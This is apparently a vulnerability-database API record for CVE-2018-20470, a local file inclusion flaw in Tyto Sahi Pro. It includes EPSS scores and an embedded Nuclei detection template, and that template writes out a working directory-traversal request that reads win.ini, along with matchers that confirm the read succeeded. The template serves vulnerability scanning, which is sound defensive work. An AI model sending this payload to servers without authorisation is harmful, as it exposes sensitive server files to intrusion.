{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-20470/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-20470/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-20470/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-20470/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-20470/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-20470"},"sightings":{"href":"/api/v1/sightings/cve-2018-20470"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.4606,"kev":false,"percentile":0.98756},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-20470.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2018-20470\n\ninfo:\n  name: Tyto Sahi pro 7.x/8.x - Local File Inclusion\n  author: daffainfo\n  severity: high\n  description: |\n    Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.\n  remediation: |\n    Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro.\n  reference:\n    - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/\n    - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-20470\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2018-20470\n    cwe-id: CWE-22\n    epss-score: 0.4606\n    epss-percentile: 0.98756\n    cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: sahipro\n    product: sahi_pro\n  tags: cve2018,cve,lfi,packetstorm,sahipro,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"bit app support\"\n          - \"fonts\"\n          - \"extensions\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100fd00e971ba79528619ec909abb7c79cdf6281e6cfeee21d5ad676be0a7ff424402203985ac7fb9abc6ed5eddd5b13bdf147a97f89823ce1f8d9d7baa7ccf0f6d6a67:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-20470"}